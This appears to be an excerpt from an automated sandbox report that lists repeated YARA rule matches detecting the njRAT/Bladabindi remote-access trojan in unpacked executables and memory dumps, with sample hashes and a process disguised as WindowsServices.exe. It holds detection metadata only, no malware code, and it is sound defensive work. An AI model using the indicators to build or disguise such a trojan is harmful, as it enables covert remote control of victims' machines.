        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
